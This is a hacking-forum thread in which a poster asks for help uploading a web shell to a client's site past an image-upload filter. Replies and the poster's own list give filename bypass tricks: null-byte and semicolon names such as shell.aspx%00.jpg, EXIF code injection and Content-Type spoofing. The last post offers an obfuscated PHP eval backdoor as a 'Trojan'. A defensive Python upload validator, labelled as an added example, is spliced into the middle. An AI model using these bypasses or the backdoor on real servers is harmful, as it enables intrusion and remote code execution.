Thread: upload web shell

  1. #1

    upload web shell

    Hi there,
    While I'm doing penetration testing for a client, I'm dealing with the following problem:
    I have the possibility of uploading a file, but I was not able to bypass the protections.

    The website uses FCKeditor. I have tried everything, but the file upload feature is blocked (Config['Enabled'] = false in all of the languages (python, perl etc.)).

    The website uses an unknown CMS.
    I have searched for vulnerabilities that could lead to remote command execution (SQL injection, RFI/LFI etc.),

    but I found a file upload system which can potentially upload a web shell.
    I've tried everything, such as: injecting PHP code into the image's EXIF, null byte injection, all the combinations on the file's name (it uploads the file but with the %00.jpg or with the ;.jpg), changing the content-type.

    There's a function which paints the wanted image and returns an error in case the image couldn't be painted.
    Some help would be great.
    thank you!

  2. #2
    Webapp Secninja
    Hacking Wacking Sab Moh Maya Hai

  3. #3
    Quote Originally Posted by prakhar
    It doesn't help too much because FCKeditor's upload system is blocked in the config file in all of the language folders (perl, php, python..), therefore
    uploading a web shell through FCKeditor would not be possible unless you have a way of changing Config["Enabled"] to true.

  4. #4
    Webapp Secninja
    Ah, if it's disabled then I don't think there is a way out -_-

  5. #5
    Quote Originally Posted by prakhar
    Ah, if it's disabled then I don't think there is a way out -_-
    You should read the whole post.

    I said there's one more image upload system that may be vulnerable.
    I've tried everything..
    Injecting code into the image's metadata (EXIF), changing the content-type, NULL byte injection (succeeds, but there is an ASP.NET function which returns true whether the file could be painted), mixing code with a known image file format and sending it with another content type and file name (shell.aspx%00.jpg)..

  6. #6
    Garage Addict 41.w4r10r
    If it's IIS 6.0 then try abcd.aspx;.jpg and access the image directly
    eg: ******.com/abcd.aspx;.jpg
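
Added example, not part of the thread or any poster's code: a server-side upload check that rejects the filename patterns discussed above (NUL byte, semicolon, script extension before an image extension), ignores the client's Content-Type, and stores the file under a server-generated name. The function names, the allowlist and the sample bytes are assumptions made for illustration.

```python
import os
import re
import secrets

# Hypothetical allowlist: final extension -> required leading magic bytes.
ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
# Script extensions that must not appear anywhere in the client-supplied name.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|php\d?|phtml|jsp|cgi|pl|py)(?=\.|$)", re.I)


class RejectedUpload(ValueError):
    pass


def safe_upload_name(client_name: str, data: bytes) -> str:
    """Validate an upload; return a server-generated storage name or raise."""
    name = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in name or "%00" in name:
        raise RejectedUpload("NUL byte in filename")
    if ";" in name:
        raise RejectedUpload("semicolon in filename")
    if SCRIPT_EXT.search(name):
        raise RejectedUpload("script extension in filename")
    ext = os.path.splitext(name)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        raise RejectedUpload("extension not allowlisted")
    # The client's Content-Type header is never consulted; only the bytes are.
    if not data.startswith(magic):
        raise RejectedUpload("content does not match extension")
    # Magic bytes do not prove the file is harmless (metadata can carry text),
    # so store outside any script-executing directory under a random name.
    return secrets.token_hex(16) + ext


def verdict(client_name: str, data: bytes) -> str:
    """Return 'accepted' or the rejection reason, for logging and tests."""
    try:
        safe_upload_name(client_name, data)
        return "accepted"
    except RejectedUpload as exc:
        return str(exc)


# Constructed sample: the first bytes of a JPEG file, not a real image.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
```

Because the stored name is generated by the server, nothing the client puts in the filename reaches the file system or the web server's extension handling.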

  7. #7

    shell

    Very old technology

  8. #8
    Give you a Trojan < ?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
